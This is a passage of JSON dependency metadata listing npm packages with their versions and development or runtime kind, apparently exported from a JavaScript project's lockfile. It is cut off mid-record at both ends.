nts":"2.0.1","direct":false,"kind":"development","optional":false},{"id":93892949,"package_name":"rc","ecosystem":"npm","requirements":"1.2.8","direct":false,"kind":"development","optional":false},{"id":93892950,"package_name":"readable-stream","ecosystem":"npm","requirements":"2.3.7","direct":false,"kind":"development","optional":false},{"id":93892951,"package_name":"rimraf","ecosystem":"npm","requirements":"2.7.1","direct":false,"kind":"development","optional":false},{"id":93892952,"package_name":"safer-buffer","ecosystem":"npm","requirements":"2.1.2","direct":false,"kind":"development","optional":false},{"id":93892953,"package_name":"sax","ecosystem":"npm","requirements":"1.2.4","direct":false,"kind":"development","optional":false},{"id":93892954,"package_name":"semver","ecosystem":"npm","requirements":"5.7.1","direct":false,"kind":"development","optional":false},{"id":93892955,"package_name":"set-blocking","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":93892956,"package_name":"signal-exit","ecosystem":"npm","requirements":"3.0.2","direct":false,"kind":"development","optional":false},{"id":93892957,"package_name":"string_decoder","ecosystem":"npm","requirements":"1.1.1","direct":false,"kind":"development","optional":false},{"id":93892958,"package_name":"strip-json-comments","ecosystem":"npm","requirements":"2.0.1","direct":false,"kind":"development","optional":false},{"id":93892959,"package_name":"tar","ecosystem":"npm","requirements":"4.4.13","direct":false,"kind":"development","optional":false},{"id":93892960,"package_name":"util-deprecate","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":93892961,"package_name":"wide-align","ecosystem":"npm","requirements":"1.1.3","direct":false,"kind":"development","optional":false},{"id":93892962,"package_name":"wrappy","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":93892963,"package_name":"yallist","ecosystem":"npm","requirements":"3.1.1","direct":false,"kind":"development","optional":false},{"id":93892964,"package_name":"fstream","ecosystem":"npm","requirements":"1.0.12","direct":false,"kind":"development","optional":false},{"id":93892965,"package_name":"function-bind","ecosystem":"npm","requirements":"1.1.1","direct":false,"kind":"development","optional":false},{"id":93892966,"package_name":"functional-red-black-tree","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93892967,"package_name":"gaze","ecosystem":"npm","requirements":"1.1.3","direct":false,"kind":"development","optional":false},{"id":93892968,"package_name":"gensync","ecosystem":"npm","requirements":"1.0.0-beta.2","direct":false,"kind":"development","optional":false},{"id":93892969,"package_name":"get-caller-file","ecosystem":"npm","requirements":"2.0.5","direct":false,"kind":"runtime","optional":false},{"id":93892970,"package_name":"get-func-name","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":93892971,"package_name":"get-intrinsic","ecosystem":"npm","requirements":"1.1.1","direct":false,"kind":"development","optional":false},{"id":93892972,"package_name":"get-own-enumerable-property-symbols","ecosystem":"npm","requirements":"3.0.2","direct":false,"kind":"development","optional":false},{"id":93892973,"package_name":"get-stdin","ecosystem":"npm","requirements":"4.0.1","direct":false,"kind":"development","optional":false},{"id":93892974,"package_name":"get-stream","ecosystem":"npm","requirements":"4.1.0","direct":false,"kind":"development","optional":false},{"id":93892975,"package_name":"get-value","ecosystem":"npm","requirements":"2.0.6","direct":false,"kind":"development","optional":false},{"id":93892976,"package_name":"getobject","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":93892977,"package_name":"getpass","ecosystem":"npm","requirements":"0.1.7","direct":false,"kind":"development","optional":false},{"id":93892978,"package_name":"glob","ecosystem":"npm","requirements":"5.0.15","direct":false,"kind":"development","optional":false},{"id":93892979,"package_name":"glob-base","ecosystem":"npm","requirements":"0.3.0","direct":false,"kind":"development","optional":false},{"id":93892980,"package_name":"glob-parent","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":93892981,"package_name":"global-modules","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93892982,"package_name":"global-prefix","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":93892983,"package_name":"globals","ecosystem":"npm","requirements":"6.4.1","direct":false,"kind":"development","optional":false},{"id":93892984,"package_name":"globby","ecosystem":"npm","requirements":"10.0.2","direct":false,"kind":"development","optional":false},{"id":93892985,"package_name":"ignore","ecosystem":"npm","requirements":"5.1.4","direct":false,"kind":"development","optional":false},{"id":93892986,"package_name":"globule","ecosystem":"npm","requirements":"1.3.1","direct":false,"kind":"development","optional":false},{"id":93892987,"package_name":"graceful-fs","ecosystem":"npm","requirements":"4.2.8","direct":false,"kind":"development","optional":false},{"id":93892988,"package_name":"growl","ecosystem":"npm","requirements":"1.10.5","direct":false,"kind":"development","optional":false},{"id":93892989,"package_name":"grunt","ecosystem":"npm","requirements":"1.5.3","direct":false,"kind":"development","optional":false},{"id":93892990,"package_name":"glob","ecosystem":"npm","requirements":"7.1.7","direct":false,"kind":"development","optional":false},{"id":93892991,"package_name":"mkdirp","ecosystem":"npm","requirements":"1.0.4","direct":false,"kind":"development","optional":false},{"id":93892992,"package_name":"grunt-babel","ecosystem":"npm","requirements":"5.0.3","direct":false,"kind":"development","optional":false},{"id":93892993,"package_name":"grunt-bg-shell","ecosystem":"npm","requirements":"2.3.3","direct":false,"kind":"development","optional":false},{"id":93892994,"package_name":"grunt-cli","ecosystem":"npm","requirements":"1.4.3","direct":false,"kind":"development","optional":false},{"id":93892995,"package_name":"grunt-contrib-clean","ecosystem":"npm","requirements":"1.1.0","direct":false,"kind":"development","optional":false},{"id":93892996,"package_name":"grunt-contrib-concat","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93892997,"package_name":"grunt-contrib-connect","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":93892998,"package_name":"grunt-contrib-copy","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93892999,"package_name":"grunt-contrib-requirejs","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93893000,"package_name":"grunt-contrib-uglify","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":93893001,"package_name":"async","ecosystem":"npm","requirements":"0.2.10","direct":false,"kind":"development","optional":false},{"id":93893002,"package_name":"uglify-js","ecosystem":"npm","requirements":"2.6.4","direct":false,"kind":"development","optional":false},{"id":93893003,"package_name":"window-size","ecosystem":"npm","requirements":"0.1.0","direct":false,"kind":"development","optional":false},{"id":93893004,"package_name":"yargs","ecosystem":"npm","requirements":"3.10.0","direct":false,"kind":"development","optional":false},{"id":93893005,"package_name":"grunt-contrib-watch","ecosystem":"npm","requirements":"1.1.0","direct":false,"kind":"development","optional":false},{"id":93893006,"package_name":"async","ecosystem":"npm","requirements":"2.6.4","direct":false,"kind":"development","optional":false},{"id":93893007,"package_name":"grunt-known-options","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":93893008,"package_name":"grunt-legacy-log","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":93893009,"package_name":"grunt-legacy-log-utils","ecosystem":"npm","requirements":"2.1.0","direct":false,"kind":"development","optional":false},{"id":93893010,"package_name":"grunt-legacy-util","ecosystem":"npm","requirements":"2.0.1","direct":false,"kind":"development","optional":false},{"id":93893011,"package_name":"async","ecosystem":"npm","requirements":"3.2.4","direct":false,"kind":"development","optional":false},{"id":93893012,"package_name":"which","ecosystem":"npm","requirements":"2.0.2","direct":false,"kind":"development","optional":false},{"id":93893013,"package_name":"grunt-webpack","ecosystem":"npm","requirements":"1.0.18","direct":false,"kind":"development","optional":false},{"id":93893014,"package_name":"gzip-size","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93893015,"package_name":"har-schema","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":93893016,"package_name":"har-validator","ecosystem":"npm","requirements":"5.1.3","direct":false,"kind":"development","optional":false},{"id":93893017,"package_name":"has","ecosystem":"npm","requirements":"1.0.3","direct":false,"kind":"development","optional":false},{"id":93893018,"package_name":"has-ansi","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":93893019,"package_name":"has-flag","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":93893020,"package_name":"has-symbols","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":93893021,"package_name":"has-value","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93893022,"package_name":"has-values","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93893023,"package_name":"is-number","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":93893024,"package_name":"kind-of","ecosystem":"npm","requirements":"3.2.2","direct":false,"kind":"development","optional":false},{"id":93893025,"package_name":"kind-of","ecosystem":"npm","requirements":"4.0.0","direct":false,"kind":"development","optional":false},{"id":93893026,"package_name":"hasha","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":93893027,"package_name":"he","ecosystem":"npm","requirements":"1.1.1","direct":false,"kind":"development","optional":false},{"id":93893028,"package_name":"home-or-tmp","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93893029,"package_name":"homedir-polyfill","ecosystem":"npm","requirements":"1.0.3","direct":false,"kind":"development","optional":false},{"id":93893030,"package_name":"hooker","ecosystem":"npm","requirements":"0.2.3","direct":false,"kind":"development","optional":false},{"id":93893031,"package_name":"hosted-git-info","ecosystem":"npm","requirements":"2.8.9","direct":false,"kind":"development","optional":false},{"id":93893032,"package_name":"html-escaper","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":93893033,"package_name":"http-errors","ecosystem":"npm","requirements":"1.6.3","direct":false,"kind":"development","optional":false},{"id":93893034,"package_name":"http-parser-js","ecosystem":"npm","requirements":"0.4.10","direct":false,"kind":"development","optional":false},{"id":93893035,"package_name":"http-proxy","ecosystem":"npm","requirements":"1.18.1","direct":false,"kind":"development","optional":false},{"id":93893036,"package_name":"http-proxy-middleware","ecosystem":"npm","requirements":"0.17.4","direct":false,"kind":"development","optional":false},{"id":93893037,"package_name":"is-glob","ecosystem":"npm","requirements":"3.1.0","direct":false,"kind":"development","optional":false},{"id":93893038,"package_name":"http-signature","ecosystem":"npm","requirements":"1.2.0","direct":false,"kind":"development","optional":false},{"id":93893039,"package_name":"http2","ecosystem":"npm","requirements":"3.3.7","direct":false,"kind":"development","optional":false},{"id":93893040,"package_name":"https-browserify","ecosystem":"npm","requirements":"0.0.1","direct":false,"kind":"development","optional":false},{"id":93893041,"package_name":"husky","ecosystem":"npm","requirements":"3.1.0","direct":false,"kind":"development","optional":false},{"id":93893042,"package_name":"get-stdin","ecosystem":"npm","requirements":"7.0.0","direct":false,"kind":"development","optional":false},{"id":93893043,"package_name":"parse-json","ecosystem":"npm","requirements":"5.0.0","direct":false,"kind":"development","optional":false},{"id":93893044,"package_name":"read-pkg","ecosystem":"npm","requirements":"5.2.0","direct":false,"kind":"development","optional":false},{"id":93893045,"package_name":"type-fest","ecosystem":"npm","requirements":"0.6.0","direct":false,"kind":"development","optional":false},{"id":93893046,"package_name":"ieee754","ecosystem":"npm","requirements":"1.1.13","direct":false,"kind":"development","optional":false},{"id":93893047,"package_name":"ignore","ecosystem":"npm","requirements":"4.0.6","direct":false,"kind":"development","optional":false},{"id":93893048,"package_name":"import-fresh","ecosystem":"npm","requirements":"3.2.1","direct":false,"kind":"development","optional":false},{"id":93893049,"package_name":"imurmurhash","ecosystem":"npm","requirements":"0.1.4","direct":false,"kind":"development","optional":false},{"id":93893050,"package_name":"indent-string","ecosystem":"npm","requirements":"2.1.0","direct":false,"kind":"development","optional":false},{"id":93893051,"package_name":"repeating","ecosystem":"npm","requirements":"2.0.1","direct":false,"kind":"development","optional":false},{"id":93893052,"package_name":"indexof","ecosystem":"npm","requirements":"0.0.1","direct":false,"kind":"development","optional":false},{"id":93893053,"package_name":"ini","ecosystem":"npm","requirements":"1.3.8","direct":false,"kind":"development","optional":false},{"id":93893054,"package_name":"inquirer","ecosystem":"npm","requirements":"7.1.0","direct":false,"kind":"development","optional":false},{"id":93893055,"package_name":"chalk","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":93893056,"package_name":"supports-color","ecosystem":"npm","requirements":"7.1.0","direct":false,"kind":"development","optional":false},{"id":93893057,"package_name":"interpret","ecosystem":"npm","requirements":"1.1.0","direct":false,"kind":"development","optional":false},{"id":93893058,"package_name":"invert-kv","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93893059,"package_name":"ip","ecosystem":"npm","requirements":"1.1.5","direct":false,"kind":"development","optional":false},{"id":93893060,"package_name":"ipaddr.js","ecosystem":"npm","requirements":"1.9.1","direct":false,"kind":"development","optional":false},{"id":93893061,"package_name":"is-absolute","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93893062,"package_name":"is-accessor-descriptor","ecosystem":"npm","requirements":"0.1.6","direct":false,"kind":"development","optional":false},{"id":93893063,"package_name":"is-arrayish","ecosystem":"npm","requirements":"0.2.1","direct":false,"kind":"development","optional":false},{"id":93893064,"package_name":"is-binary-path","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93893065,"package_name":"is-buffer","ecosystem":"npm","requirements":"1.1.6","direct":false,"kind":"development","optional":false},{"id":93893066,"package_name":"is-core-module","ecosystem":"npm","requirements":"2.9.0","direct":false,"kind":"development","optional":false},{"id":93893067,"package_name":"is-data-descriptor","ecosystem":"npm","requirements":"0.1.4","direct":false,"kind":"development","optional":false},{"id":93893068,"package_name":"is-descriptor","ecosystem":"npm","requirements":"0.1.6","direct":false,"kind":"development","optional":false},{"id":93893069,"package_name":"kind-of","ecosystem":"npm","requirements":"5.1.0","direct":false,"kind":"development","optional":false},{"id":93893070,"package_name":"is-directory","ecosystem":"npm","requirements":"0.3.1","direct":false,"kind":"development","optional":false},{"id":93893071,"package_name":"is-docker","ecosystem":"npm","requirements":"2.2.1","direct":false,"kind":"development","optional":false},{"id":93893072,"package_name":"is-dotfile","ecosystem":"npm","requirements":"1.0.3","direct":false,"kind":"development","optional":false},{"id":93893073,"package_name":"is-equal-shallow","ecosystem":"npm","requirements":"0.1.3","direct":false,"kind":"development","optional":false},{"id":93893074,"package_name":"is-extendable","ecosystem":"npm","requirements":"0.1.1","direct":false,"kind":"development","optional":false},{"id":93893075,"package_name":"is-extglob","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93893076,"package_name":"is-finite","ecosystem":"npm","requirements":"1.1.0","direct":false,"kind":"development","optional":false},{"id":93893077,"package_name":"is-fullwidth-code-point","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"runtime","optional":false},{"id":93893078,"package_name":"is-glob","ecosystem":"npm","requirements":"2.0.1","direct":false,"kind":"development","optional":false},{"id":93893079,"package_name":"is-integer","ecosystem":"npm","requirements":"1.0.7","direct":false,"kind":"development","optional":false},{"id":93893080,"package_name":"is-number","ecosystem":"npm","requirements":"2.1.0","direct":false,"kind":"development","optional":false},{"id":93893081,"package_name":"is-obj","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93893082,"package_name":"is-observable","ecosystem":"npm","requirements":"1.1.0","direct":false,"kind":"development","optional":false},{"id":93893083,"package_name":"is-path-cwd","ecosystem":"npm","requirements":"2.2.0","direct":false,"kind":"development","optional":false},{"id":93893084,"package_name":"is-path-inside","ecosystem":"npm","requirements":"3.0.2","direct":false,"kind":"development","optional":false},{"id":93893085,"package_name":"is-plain-object","ecosystem":"npm","requirements":"2.0.4","direct":false,"kind":"development","optional":false},{"id":93893086,"package_name":"is-posix-bracket","ecosystem":"npm","requirements":"0.1.1","direct":false,"kind":"development","optional":false},{"id":93893087,"package_name":"is-primitive","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":93893088,"package_name":"is-promise","ecosystem":"npm","requirements":"2.1.0","direct":false,"kind":"development","optional":false},{"id":93893089,"package_name":"is-regexp","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93893090,"package_name":"is-relative","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93893091,"package_name":"is-stream","ecosystem":"npm","requirements":"1.1.0","direct":false,"kind":"development","optional":false},{"id":93893092,"package_name":"is-typedarray","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93893093,"package_name":"is-unc-path","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93893094,"package_name":"is-utf8","ecosystem":"npm","requirements":"0.2.1","direct":false,"kind":"development","optional":false},{"id":93893095,"package_name":"is-windows","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":93893096,"package_name":"is-wsl","ecosystem":"npm","requirements":"2.2.0","direct":false,"kind":"development","optional":false},{"id":93893097,"package_name":"isexe","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":93893098,"package_name":"isobject","ecosystem":"npm","requirements":"2.1.0","direct":false,"kind":"development","optional":false},{"id":93893099,"package_name":"isstream","ecosystem":"npm","requirements":"0.1.2","direct":false,"kind":"development","optional":false},{"id":93893100,"package_name":"istanbul-lib-coverage","ecosystem":"npm","requirements":"2.0.5","direct":false,"kind":"development","optional":false},{"id":93893101,"package_name":"istanbul-lib-hook","ecosystem":"npm","requirements":"2.0.7","direct":false,"kind":"development","optional":false},{"id":93893102,"package_name":"istanbul-lib-instrument","ecosystem":"npm","requirements":"3.3.0","direct":false,"kind":"development","optional":false},{"id":93893103,"package_name":"istanbul-lib-report","ecosystem":"npm","requirements":"2.0.8","direct":false,"kind":"development","optional":false},{"id":93893104,"package_name":"istanbul-lib-source-maps","ecosystem":"npm","requirements":"3.0.6","direct":false,"kind":"development","optional":false},{"id":93893105,"package_name":"istanbul-reports","ecosystem":"npm","requirements":"2.2.7","direct":false,"kind":"development","optional":false},{"id":93893106,"package_name":"jest-diff","ecosystem":"npm","requirements":"27.4.2","direct":false,"kind":"development","optional":false},{"id":93893107,"package_name":"jest-get-type","ecosystem":"npm","requirements":"27.4.0","direct":false,"kind":"development","optional":false},{"id":93893108,"package_name":"jest-matcher-utils","ecosystem":"npm","requirements":"27.2.5","direct":false,"kind":"development","optional":false},{"id":93893109,"package_name":"jest-message-util","ecosystem":"npm","requirements":"27.4.2","direct":false,"kind":"development","optional":false},{"id":93893110,"package_name":"micromatch","ecosystem":"npm","requirements":"4.0.4","direct":false,"kind":"development","optional":false},{"id":93893111,"package_name":"jest-regex-util","ecosystem":"npm","requirements":"27.4.0","direct":false,"kind":"development","optional":false},{"id":93893112,"package_name":"jmespath","ecosystem":"npm","requirements":"0.16.0","direct":false,"kind":"development","optional":false},{"id":93893113,"package_name":"jpeg-js","ecosystem":"npm","requirements":"0.4.4","direct":false,"kind":"development","optional":false},{"id":93893114,"package_name":"js-tokens","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93893115,"package_name":"js-yaml","ecosystem":"npm","requirements":"3.14.1","direct":false,"kind":"development","optional":false},{"id":93893116,"package_name":"esprima","ecosystem":"npm","requirements":"4.0.1","direct":false,"kind":"development","optional":false},{"id":93893117,"package_name":"jsbn","ecosystem":"npm","requirements":"0.1.1","direct":false,"kind":"development","optional":false},{"id":93893118,"package_name":"jsesc","ecosystem":"npm","requirements":"0.5.0","direct":false,"kind":"development","optional":false},{"id":93893119,"package_name":"json-parse-better-errors","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":93893120,"package_name":"json-schema","ecosystem":"npm","requirements":"0.4.0","direct":false,"kind":"development","optional":false},{"id":93893121,"package_name":"json-schema-traverse","ecosystem":"npm","requirements":"0.4.1","direct":false,"kind":"development","optional":false},{"id":93893122,"package_name":"json-stable-stringify","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93893123,"package_name":"json-stable-stringify-without-jsonify","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93893124,"package_name":"json-stringify-safe","ecosystem":"npm","requirements":"5.0.1","direct":false,"kind":"development","optional":false},{"id":93893125,"package_name":"json3","ecosystem":"npm","requirements":"3.3.3","direct":false,"kind":"development","optional":false},{"id":93893126,"package_name":"json5","ecosystem":"npm","requirements":"0.4.0","direct":false,"kind":"development","optional":false},{"id":93893127,"package_name":"jsonfile","ecosystem":"npm","requirements":"4.0.0","direct":false,"kind":"development","optional":false},{"id":93893128,"package_name":"jsonify","ecosystem":"npm","requirements":"0.0.0","direct":false,"kind":"development","optional":false},{"id":93893129,"package_name":"jsprim","ecosystem":"npm","requirements":"1.4.2","direct":false,"kind":"development","optional":false},{"id":93893130,"package_name":"just-extend","ecosystem":"npm","requirements":"4.1.0","direct":false,"kind":"development","optional":false},{"id":93893131,"package_name":"lazy-cache","ecosystem":"npm","requirements":"1.0.4","direct":false,"kind":"development","optional":false},{"id":93893132,"package_name":"lcid","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93893133,"package_name":"leven","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":93893134,"package_name":"levn","ecosystem":"npm","requirements":"0.3.0","direct":false,"kind":"development","optional":false},{"id":93893135,"package_name":"liftup","ecosystem":"npm","requirements":"3.0.1","direct":false,"kind":"development","optional":false},{"id":93893136,"package_name":"findup-sync","ecosystem":"npm","requirements":"4.0.0","direct":false,"kind":"development","optional":false},{"id":93893137,"package_name":"is-glob","ecosystem":"npm","requirements":"4.0.3","direct":false,"kind":"development","optional":false},{"id":93893138,"package_name":"micromatch","ecosystem":"npm","requirements":"4.0.5","direct":false,"kind":"development","optional":false},{"id":93893139,"package_name":"lines-and-columns","ecosystem":"npm","requirements":"1.1.6","direct":false,"kind":"development","optional":false},{"id":93893140,"package_name":"lint-staged","ecosystem":"npm","requirements":"9.5.0","direct":false,"kind":"development","optional":false},{"id":93893141,"package_name":"cross-spawn","ecosystem":"npm","requirements":"7.0.1","direct":false,"kind":"development","optional":false},{"id":93893142,"package_name":"execa","ecosystem":"npm","requirements":"2.1.0","direct":false,"kind":"development","optional":false},{"id":93893143,"package_name":"get-stream","ecosystem":"npm","requirements":"5.1.0","direct":false,"kind":"development","optional":false},{"id":93893144,"package_name":"is-stream","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":93893145,"package_name":"normalize-path","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":93893146,"package_name":"npm-run-path","ecosystem":"npm","requirements":"3.1.0","direct":false,"kind":"development","optional":false},{"id":93893147,"package_name":"p-finally","ecosystem":"npm","requirements":"2.0.1","direct":false,"kind":"development","optional":false},{"id":93893148,"package_name":"path-key","ecosystem":"npm","requirements":"3.1.1","direct":false,"kind":"development","optional":false},{"id":93893149,"package_name":"shebang-command","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":93893150,"package_name":"shebang-regex","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":93893151,"package_name":"listr","ecosystem":"npm","requirements":"0.14.3","direct":false,"kind":"development","optional":false},{"id":93893152,"package_name":"p-map","ecosystem":"npm","requirements":"2.1.0","direct":false,"kind":"development","optional":false},{"id":93893153,"package_name":"listr-silent-renderer","ecosystem":"npm","requirements":"1.1.1","direct":false,"kind":"development","optional":false},{"id":93893154,"package_name":"listr-update-renderer","ecosystem":"npm","requirements":"0.5.0","direct":false,"kind":"development","optional":false},{"id":93893155,"package_name":"figures","ecosystem":"npm","requirements":"1.7.0","direct":false,"kind":"development","optional":false},{"id":93893156,"package_name":"indent-string","ecosystem":"npm","requirements":"3.2.0","direct":false,"kind":"development","optional":false},{"id":93893157,"package_name":"log-symbols","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":93893158,"package_name":"listr-verbose-renderer","ecosystem":"npm","requirements":"0.5.0","direct":false,"kind":"development","optional":false},{"id":93893159,"package_name":"cli-cursor","ecosystem":"npm","requirements":"2.1.0","direct":false,"kind":"development","optional":false},{"id":93893160,"package_name":"date-fns","ecosystem":"npm","requirements":"1.30.1","direct":false,"kind":"development","optional":false},{"id":93893161,"package_name":"figures","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":93893162,"package_name":"mimic-fn","ecosystem":"npm","requirements":"1.2.0","direct":false,"kind":"development","optional":false},{"id":93893163,"package_name":"onetime","ecosystem":"npm","requirements":"2.0.1","direct":false,"kind":"development","optional":false},{"id":93893164,"package_name":"restore-cursor","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":93893165,"package_name":"livereload-js","ecosystem":"npm","requirements":"2.4.0","direct":false,"kind":"development","optional":false},{"id":93893166,"package_name":"load-json-file","ecosystem":"npm","requirements":"1.1.0","direct":false,"kind":"development","optional":false},{"id":93893167,"package_name":"parse-json","ecosystem":"npm","requirements":"2.2.0","direct":false,"kind":"development","optional":false},{"id":93893168,"package_name":"pify","ecosystem":"npm","requirements":"2.3.0","direct":false,"kind":"development","optional":false},{"id":93893169,"package_name":"loader-utils","ecosystem":"npm","requirements":"0.2.17","direct":false,"kind":"development","optional":false},{"id":93893170,"package_name":"json5","ecosystem":"npm","requirements":"0.5.1","direct":false,"kind":"development","optional":false},{"id":93893171,"package_name":"locate-path","ecosystem":"npm","requirements":"5.0.0","direct":false,"kind":"development","optional":false},{"id":93893172,"package_name":"lodash","ecosystem":"npm","requirements":"4.17.21","direct":false,"kind":"development","optional":false},{"id":93893173,"package_name":"lodash.flattendeep","ecosystem":"npm","requirements":"4.4.0","direct":false,"kind":"development","optional":false},{"id":93893174,"package_name":"lodash.memoize","ecosystem":"npm","requirements":"4.1.2","direct":false,"kind":"development","optional":false},{"id":93893175,"package_name":"log-symbols","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":93893176,"package_name":"log-update","ecosystem":"npm","requirements":"2.3.0","direct":false,"kind":"development","optional":false},{"id":93893177,"package_name":"ansi-escapes","ecosystem":"npm","requirements":"3.2.0","direct":false,"kind":"development","optional":false},{"id":93893178,"package_name":"ansi-regex","ecosystem":"npm","requirements":"3.0.1","direct":false,"kind":"development","optional":false},{"id":93893179,"package_name":"string-width","ecosystem":"npm","requirements":"2.1.1","direct":false,"kind":"development","optional":false},{"id":93893180,"package_name":"strip-ansi","ecosystem":"npm","requirements":"4.0.0","direct":false,"kind":"development","optional":false},{"id":93893181,"package_name":"wrap-ansi","ecosystem":"npm","requirements":"3.0.1","direct":false,"kind":"development","optional":false},{"id":93893182,"package_name":"lolex","ecosystem":"npm","requirements":"4.2.0","direct":false,"kind":"development","optional":false},{"id":93893183,"package_name":"longest","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93893184,"package_name":"loud-rejection","ecosystem":"npm","requirements":"1.6.0","direct":false,"kind":"development","optional":false},{"id":93893185,"package_name":"lru-cache","ecosystem":"npm","requirements":"4.1.5","direct":false,"kind":"development","optional":false},{"id":93893186,"package_name":"make-dir","ecosystem":"npm","requirements":"2.1.0","direct":false,"kind":"development","optional":false},{"id":93893187,"package_name":"make-iterator","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93893188,"package_name":"map-cache","ecosystem":"npm","requirements":"0.2.2","direct":false,"kind":"development","optional":false},{"id":93893189,"package_name":"map-obj","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93893190,"package_name":"map-visit","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93893191,"package_name":"math-random","ecosystem":"npm","requirements":"1.0.4","direct":false,"kind":"development","optional":false},{"id":93893192,"package_name":"maxmin","ecosystem":"npm","requirements":"1.1.0","direct":false,"kind":"development","optional":false},{"id":93893193,"package_name":"media-typer","ecosystem":"npm","requirements":"0.3.0","direct":false,"kind":"development","optional":false},{"id":93893194,"package_name":"memory-fs","ecosystem":"npm","requirements":"0.3.0","direct":false,"kind":"development","optional":false},{"id":93893195,"package_name":"meow","ecosystem":"npm","requirements":"3.7.0","direct":false,"kind":"development","optional":false},{"id":93893196,"package_name":"merge-descriptors","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93893197,"package_name":"merge-source-map","ecosystem":"npm","requirements":"1.1.0","direct":false,"kind":"development","optional":false},{"id":93893198,"package_name":"merge-stream","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":93893199,"package_name":"merge2","ecosystem":"npm","requirements":"1.3.0","direct":false,"kind":"development","optional":false},{"id":93893200,"package_name":"methods","ecosystem":"npm","requirements":"1.1.2","direct":false,"kind":"development","optional":false},{"id":93893201,"package_name":"micromatch","ecosystem":"npm","requirements":"2.3.11","direct":false,"kind":"development","optional":false},{"id":93893202,"package_name":"mime","ecosystem":"npm","requirements":"1.6.0","direct":false,"kind":"development","optional":false},{"id":93893203,"package_name":"mime-db","ecosystem":"npm","requirements":"1.43.0","direct":false,"kind":"development","optional":false},{"id":93893204,"package_name":"mime-types","ecosystem":"npm","requirements":"2.1.26","direct":false,"kind":"development","optional":false},{"id":93893205,"package_name":"mimic-fn","ecosystem":"npm","requirements":"2.1.0","direct":false,"kind":"development","optional":false},{"id":93893206,"package_name":"minimist","ecosystem":"npm","requirements":"1.2.6","direct":false,"kind":"development","optional":false},{"id":93893207,"package_name":"